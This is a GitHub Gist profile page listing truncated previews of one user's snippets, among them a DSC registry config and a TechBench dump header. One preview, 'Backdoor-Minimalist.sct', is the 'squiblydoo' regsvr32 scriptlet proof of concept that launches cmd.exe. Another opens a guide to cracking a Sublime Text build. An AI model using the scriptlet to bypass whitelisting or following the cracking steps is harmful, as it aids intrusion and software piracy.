Skip to content

Instantly share code, notes, and snippets.

View drclean's full-sized avatar

drclean

3 followers · 7 following
View GitHub Profile
@drclean
drclean / DSCEARegistryTest1.ps1
Created February 16, 2018 12:47 — forked from rkyttle/DSCEARegistryTest1.ps1
configuration DSCEARegistryTest1 {
param([string[]]$ComputerName='localhost')
Import-DscResource -ModuleName PSDesiredStateConfiguration
Node $ComputerName {
Registry 'CrashOnAuditFail' {
Ensure = 'Present'
Key = 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa'
@drclean
drclean / Techbench dump.md
Created December 14, 2016 20:44
TechBench dump (https://github.com/mkuba50/techbench-dump)

TechBench dump

Generated on 2016-12-04T21:20:00+0100 using:
- TechBench dump script (tbdump-master)
- FreeBSD 10.3-STABLE amd64 devil-1_0_4
- curl 7.49.1 (amd64-portbld-freebsd10.3) libcurl/7.49.1 OpenSSL/1.0.1s zlib/1.2.8 libssh2/1.7.0

Number of products: 173
@drclean
drclean / Backdoor-Minimalist.sct
Created April 25, 2016 12:58
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
@drclean
drclean / cracking.md
Last active August 29, 2015 14:20 — forked from vertexclique/cracking.md

MacOS

Build 3059

MD5: 59bab8f71f8c096cd3f72cd73851515d

Rename it to: Sublime Text

Make it executable with: chmod u+x Sublime\ Text